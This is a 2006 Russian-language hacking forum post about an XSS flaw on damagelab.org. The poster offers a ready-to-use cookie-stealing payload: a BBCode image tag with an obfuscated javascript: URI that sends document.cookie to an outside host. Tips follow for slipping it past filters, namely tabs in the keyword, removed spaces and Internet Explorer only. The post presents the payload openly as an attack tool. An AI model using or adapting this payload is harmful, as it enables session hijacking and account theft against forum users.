14.04.2006, 01:36
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 6
Провел на форуме:
38973
Репутация:
1
|
|
Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar
Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
Код:
[im*g]j a v a s c r i p t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]
пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов [img] и [/img]
ПС просьба репу добавлять CinerX, а не _CinerX
Последний раз редактировалось _CinerX; 14.04.2006 в 01:39..
|
|
|